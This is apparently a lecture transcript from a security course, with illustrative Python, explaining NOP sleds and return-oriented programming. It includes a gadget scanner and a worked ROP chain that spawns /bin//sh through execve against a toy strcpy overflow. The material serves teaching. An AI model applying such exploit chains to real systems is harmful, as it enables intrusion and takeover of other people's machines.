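print(len(payload), guess_hits_sled(0xBFFFD310, 0xBFFFD2C0, 100))
```

The longer the sled, the larger the range of addresses for which guess_hits_sled is true, which is why a large sled cuts down the number of guesses needed against a randomized stack.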
It actually won't work. So, to get around that, the interesting thing is: what about all of these instructions? What do the permissions have to be on, let's say, the memory at address 0x0804840E? Does the memory at 0x0804840E, which holds the bytes that represent push EBP, have to be writable? Probably not. It could be, but you don't need to change your own code. What about executable? Does it have to be executable? The binary specifies that at memory address 0x0804840E must be the bytes that correspond to the assembly instruction push EBP, and if you want your program to work, that has to be executable. It can't not be executable, right? And are most programs small? No, they're freaking really big, right? So the idea is essentially: well, why don't we reuse chunks of the actual code that's already executable? Because of the way most programs are compiled, the executable code is at a fixed memory location. It's not randomized. So that actually led to return-oriented programming. This is a super interesting concept, it's actually really awesome, so let's walk through an example. The idea is we're going to use little pieces of the code that we call gadgets. So something like, I don't know, push something onto the stack and then return, or add one to a register and then return. And you can think of it as setting up these breadcrumbs in such a way that the existing code does what we want it to do and essentially makes the system call that we want to make. There's a really great paper on this. It's called "The Geometry of Innocent Flesh on the Bone," and the idea is: in any sufficiently large body of x86 executable code there will exist sufficiently many useful code sequences that an attacker who controls the stack will be able, by means of the return-into-libc techniques we introduce, to cause the exploited program to undertake arbitrary computation.
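To make the idea of gadgets living inside existing code concrete, here is a small Python sketch that scans a blob of bytes for a few short instruction sequences ending in ret. The byte patterns are the standard 32-bit x86 encodings of those instructions; the code blob, the base address, and the find_gadgets helper are made up for illustration and are not how real gadget-finding tools are implemented.

```python
# Standard 32-bit x86 encodings of a few useful sequences.
GADGETS = {
    "pop eax; ret": b"\x58\xc3",
    "pop ebx; ret": b"\x5b\xc3",
    "pop ecx; ret": b"\x59\xc3",
    "pop edx; ret": b"\x5a\xc3",
    "xor eax, eax; ret": b"\x31\xc0\xc3",
    "inc eax; ret": b"\x40\xc3",
    "int 0x80": b"\xcd\x80",
}

def find_gadgets(code: bytes, base_addr: int) -> dict:
    """Return, for each gadget name, every address where its bytes occur in code."""
    found = {}
    for name, pattern in GADGETS.items():
        addrs = []
        pos = code.find(pattern)
        while pos != -1:
            addrs.append(base_addr + pos)
            pos = code.find(pattern, pos + 1)  # keep scanning from the next byte offset
        found[name] = addrs
    return found

# Made-up code bytes: "mov eax, 0xc35a" (b8 5a c3 00 00), a nop,
# "xor eax, eax; ret", and "int 0x80".
blob = b"\xb8\x5a\xc3\x00\x00\x90\x31\xc0\xc3\xcd\x80"
for name, addrs in find_gadgets(blob, 0x08048000).items():
    print(name, [hex(a) for a in addrs])
```

In this made-up blob, the bytes for pop edx; ret appear one byte into the mov instruction, so the scanner reports a gadget even though no such instruction was ever written in the program.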
So we're not going to talk about return-to-libc, but basically the idea there is you just set up a function frame to call a libc function. I'm going over ROP because it's the more generalized technique. So, how does this work? Actually, what I didn't tell you on that last example: to actually exploit it, I would probably have had to disable some security features, like ASLR, the stack randomization, or the non-executable stack. So here's an example. We have a super simple program: strcpy of argv[1], which is the first argument, into foo, then return 10. And foo is size 50. We always need to look at the code, so: main has push EBP, all this fun stuff, the call to strcpy. Cool. One thing I'm doing to make this slightly easier is I'm using the -static flag when I compile this. What does that do, do you think? Should an executable with, what is this, like 10 lines of assembly code be 716 kilobytes all of a sudden? Anyone know why it's so big? Yes, specifically because the -static flag statically links our executable, which means rather than loading libc and the DLLs at runtime (they're not DLLs, but the .so library files that we need), it actually compiles them all into the executable. So everything is there, which is nice if you're shipping a binary to somebody and you don't know if they have the specific libraries you need installed. Cool. So the idea is we want to find gadgets in the binary that will perform things for us, and we want to essentially encode our shellcode, encode this idea of execve of /bin/bash, or /bin/sh because /bin/sh is shorter, into the gadgets. So, looking through the system calls, what we need is the hex value 0xb, which is 11, to be in EAX. That tells the operating system:
We want to call execve. We need the address of /bin/sh in the EBX register. We need the address of, so this is the argv pointer, an array where the first element is the address of /bin/sh and the next element is null, in ECX. And we need null in EDX. Okay, so where do we put /bin/sh? We need to somehow get that into the program. So we can actually look at this executable, and, surprisingly, we would find it: you can actually find /bin/sh in libc. So this statically compiled binary will actually have the string /bin/sh, because it's used somewhere in libc, and you can find the address of this string in the binary itself, which is super handy. Now we need to be able to write some data. Yeah? Why are we using EAX, EBX, ECX instead of pushing onto the stack? Because we are making a system call, execve, and that uses the system call calling convention, the Linux calling convention. So before we call int 0x80, we need 0xb to be in EAX and we need to set these registers up correctly. But we need to be able to write some data somewhere. Oh, that's right. Okay. So we can actually see that at 0x080EA060, at this memory location, is data we can write to. So we can actually include in our stack the string /bin/sh, as long as we can somehow find a gadget that will write that out to someplace in memory. And the place that we can use at a fixed location is going to be this location, because we know it's writable. We can use any memory location that's writable, but we need to find some gadget that will do the write. There are tools that will point you to gadgets that we could use. So we can find out that the gadget at location 0x0809A67D will copy whatever's in EAX into the memory location that EDX points to. So this will take whatever's in EAX.
So if we can somehow get /bin, that hex value, into the EAX register, we can then force execution to jump to this gadget at 0x0809A67D, and this tiny little gadget will just copy that to wherever EDX points. So we need to control EAX and EDX. It's still a lot, but then we can get /bin at a fixed memory location. But we need to go gadget hunting some more. We need some gadget to get data we control into EDX. And what do we control in this situation? We control the return instruction pointer. What else? What is that return instruction pointer on top of? The base pointer. Yes. But where do they both live? What memory location is the saved instruction pointer in? On the stack. Yes. We control the stack. We can completely control the stack; we can write more or less whatever we want onto the stack. So what we're looking for is a pop EDX and then a return. And it just so happens that at this memory location there's a pop EDX followed by a ret. Remember, pop will take a value off the stack: it will literally take the value off the stack and put it into the EDX register. So great. This helps us because now we can put the address of .data onto the stack. And if we looked at this, so this is the address 0x0806E91A. And if we execute this, we'd see that we got here, so here's the instruction we're going to start executing at. What this is going to do is pop EDX. Let's say this is the first gadget that executes. It's going to take whatever's above that on the stack and put it into the EDX register. Thus we can completely control the EDX register. And then it's going to return to whatever is above that. So we can put the next gadget we want to execute, the pointer to that instruction, on the stack.
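The way ret hands control from one gadget to the next can be modeled with a toy interpreter in Python. This is a deliberately simplified sketch, not an x86 emulator: it knows only three gadgets. The pop EDX address, the mov gadget address, and the .data address are the ones mentioned in the lecture; the pop EAX address and the run_chain helper are assumed placeholders.

```python
from struct import pack, unpack

DATA = 0x080EA060                 # writable .data address from the lecture
POP_EDX_RET = 0x0806E91A          # pop edx; ret (from the lecture)
MOV_PTR_EDX_EAX_RET = 0x0809A67D  # mov [edx], eax; ret (from the lecture)
POP_EAX_RET = 0x080BB196          # pop eax; ret (placeholder address, assumed)

def run_chain(stack_words):
    """Walk a list of 32-bit stack words the way successive ret instructions would."""
    regs = {"eax": 0, "edx": 0}
    memory = {}
    stack = list(stack_words)
    while stack:
        eip = stack.pop(0)               # ret: pop the next gadget address into EIP
        if eip == POP_EDX_RET:
            regs["edx"] = stack.pop(0)   # pop edx: take the next stack word
        elif eip == POP_EAX_RET:
            regs["eax"] = stack.pop(0)   # pop eax: take the next stack word
        elif eip == MOV_PTR_EDX_EAX_RET:
            memory[regs["edx"]] = pack("<I", regs["eax"])  # store EAX where EDX points
        else:
            break                        # unknown address: the real program would crash
    return regs, memory

bin_word = unpack("<I", b"/bin")[0]      # the four bytes "/bin" as one little-endian word
regs, memory = run_chain([POP_EDX_RET, DATA, POP_EAX_RET, bin_word, MOV_PTR_EDX_EAX_RET])
print(hex(regs["edx"]), memory[DATA])
```

Each gadget consumes its own operands from the stack and then its ret consumes the next gadget's address, so the attacker-controlled stack acts as the program.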
And so essentially we're creating this stack of all these tiny little instructions: take this value, put it in this register, copy this value over here, to get the program to do what we want it to do. So we've got this, but we still need to get our data into EAX. And it turns out there's a pop EAX; ret at this memory location. There's a pop EBX; ret at this memory location. The crazy thing to think about is, remember, x86 is not a fixed-length architecture. So even if you find one of these gadgets, that does not necessarily mean that these instructions actually exist as such in the code itself. It just means that there could be, say, a five-byte instruction, and this pop EDX; ret is only two bytes. So as long as those two bytes that you need occur anywhere in executable code, you can jump to the first byte and it will start executing. We can find all of the pop EAX, pop EBX, pop ECX gadgets. We need some way to clear EAX, and a really great way to clear a register to zero is to XOR it with itself, which happens to be at this memory location. But what do we need to be inside EAX? Not just zero. We need 11; we need 0xb. So we could look for an add 10 or add 11 to EAX, but that's highly unlikely to exist. Instead, if we find an increment, we can just put it on our stack 10 times, or rather 11 times. And we need an int 0x80. So this is actually all we need in order to build what they call a ROP chain. You're going to have a chain of these little gadgets to completely take over this code. We actually want a Python script to do this, because doing this by hand is super annoying. So we can use this pack function, and pack will make sure that the endianness is taken care of. So the first thing we're going to do, this is pop EDX; ret. And this is the address of .data, so this is where we want this to go. So this gadget is going to copy whatever's after it into EDX.
Then the ret is going to execute this next gadget, which is going to take whatever's after it into EAX, which is /bin. Then we need to call our mov gadget to copy /bin to where EDX points. We then copy //sh, which is a little trick. You'd usually want /sh followed by a zero, but oftentimes you want to avoid null bytes. So you can use //sh, which behaves exactly the same. So we copy that into data plus four: we do our same thing again, with //sh. Then we zero out the thing after it, because remember we need the null terminator, and we can do that: XOR EAX with itself, and move that there. Now we actually have a null-terminated string, /bin//sh, at this fixed memory location. But now we need to build our array. I'm just going to kind of go through this quickly; you can step through it yourself. So now this is building up the argv pointer, which is a pointer to pointers, a pointer to an array of pointers. Now we'll finally be able to call execve with the address of data, which holds the string /bin//sh, and the address of data plus 12, which will be our array. And we know that data plus eight is a null byte. So we first need to get the address of data into EBX. We then get the address of data plus 12 into ECX. Then the third argument. EAX, we zero it out again, increment it 11 times, like I said, and then finally call int 0x80, which will trigger the execution of our code. And so what we can do: we can set a breakpoint at this location, run this program with this as input, and see right before it returns what's going to happen. So we can see the stack, right, is essentially all of these little gadgets. And it's going to go through every single gadget doing exactly what we said, tiny bit by tiny bit. So you can see, like, the instruction pointer: these are not in contiguous memory locations, right?
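The chain walked through above can be sketched as a short Python script using struct.pack. This is a reconstruction under assumptions, not the script shown in the lecture. Only the .data address, the pop EDX gadget, and the mov gadget addresses come from the lecture; every other gadget address is a placeholder, the padding length to the saved return address is a parameter with a made-up example value, and pointing EDX at the null word at data plus 8 is one assumed way to pass an empty environment.

```python
from struct import pack

DATA = 0x080EA060         # writable .data address (from the lecture)
POP_EDX = 0x0806E91A      # pop edx; ret (from the lecture)
MOV_EDX_EAX = 0x0809A67D  # mov [edx], eax; ret (from the lecture)
# Placeholder addresses below are assumptions, for illustration only.
POP_EAX = 0x080BB196      # pop eax; ret
POP_EBX = 0x080481C9      # pop ebx; ret
POP_ECX = 0x080DE955      # pop ecx; ret
XOR_EAX = 0x08054250      # xor eax, eax; ret
INC_EAX = 0x0807B27F      # inc eax; ret
INT_80 = 0x080493E1       # int 0x80

def p32(value: int) -> bytes:
    """Pack a 32-bit value in little-endian byte order."""
    return pack("<I", value)

def write_word(addr: int, word: bytes) -> bytes:
    """Gadgets that store the 4 raw bytes in word at addr."""
    return p32(POP_EDX) + p32(addr) + p32(POP_EAX) + word + p32(MOV_EDX_EAX)

def write_zero(addr: int) -> bytes:
    """Gadgets that store a zero word at addr without any null byte in the payload."""
    return p32(POP_EDX) + p32(addr) + p32(XOR_EAX) + p32(MOV_EDX_EAX)

def build_chain(padding_len: int) -> bytes:
    chain = b"A" * padding_len                # filler up to the saved return address
    chain += write_word(DATA, b"/bin")        # data+0:  "/bin"
    chain += write_word(DATA + 4, b"//sh")    # data+4:  "//sh"
    chain += write_zero(DATA + 8)             # data+8:  string terminator
    chain += write_word(DATA + 12, p32(DATA)) # data+12: argv[0] = address of the string
    chain += write_zero(DATA + 16)            # data+16: argv[1] = NULL
    chain += p32(POP_EBX) + p32(DATA)         # EBX = path
    chain += p32(POP_ECX) + p32(DATA + 12)    # ECX = argv
    chain += p32(POP_EDX) + p32(DATA + 8)     # EDX = pointer to a NULL word (assumed envp)
    chain += p32(XOR_EAX) + p32(INC_EAX) * 11 # EAX = 11, the execve system call number
    chain += p32(INT_80)                      # make the system call
    return chain

chain = build_chain(62)  # 62 is a made-up padding length, not measured from the lecture binary
print(len(chain), b"\x00" in chain)
```

With these particular addresses the packed chain contains no null bytes, which matters because strcpy would stop copying at the first one; different gadget addresses would need to be checked for the same property.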
I'm just doing this for show here. You can see this is at 806, this is at 80B, 809, 805, right? But the stack has pointers to all these little gadgets that are executing, and it's just going and doing whatever it's supposed to do. It's executing executable code. It's using fixed memory locations. We can see that at that memory location is the string /bin//sh. We can continue, and we'll see that it's actually executing a new program, which means we successfully exploited this buffer overflow. And it's a fully address space layout randomization-proof ROP payload, because no matter where the stack is, we actually don't care: we're only using fixed locations. You should not have to write this by yourself; I just wanted to show it to you. There are tools called ROPgadget and Ropper, where you basically point them at a binary and they will try to find as many gadgets as they can and, if possible, automatically generate a ROP chain to get a /bin/sh. So it's really cool. Yeah, I actually use those a lot. Yes, I kind of jumped past that. So if they've disabled stack execution, but there is, let's say, a call to the function system in some short snippet of code, then without an executable stack you can still modify the parameters going into that call to system to take control of the execution that way, if you know where the system function is actually located, which depends. Sometimes you can know, sometimes you can't. And oftentimes what you'll actually need in the real world is multiple exploits and vulnerabilities together. So you may need one vulnerability that leaks data and leaks a pointer, so that tells you where everything is located, and then you can exploit that by jumping to that location. So yeah, I needed to focus on one thing, and ROP is definitely the most real-world type of thing that you can do. So this is why I wanted to talk about it here.
Because it bypasses almost all of the current defenses. And there are all kinds of variations. So, briefly: the research in this area is to automate all of this. We have a new professor in the department, who you may not know yet because he just started, Yan Shoshitaishvili. He led the DARPA Cyber Grand Challenge team at UC Santa Barbara, where they got third place and won, I think, a total of $1.5 million by creating an automated hacking system. These were completely autonomous systems. There were 10 teams. They each had access to a number of binaries, and their system had to identify vulnerabilities in those binaries, automatically synthesize exploits that would work against the other teams, and also inject patches into their own binaries to properly patch them. And then, if you chose to patch, you would get everyone else's patches, so you could actually try to find vulnerabilities that were still left over after their patches. So it's a super interesting problem: how to exploit these automatically, how to create better defensive techniques, how to combat the problem of multiple vulnerabilities and information disclosure, and all that stuff. So it's a super awesome research area. All right. Sweet. Have a good next year.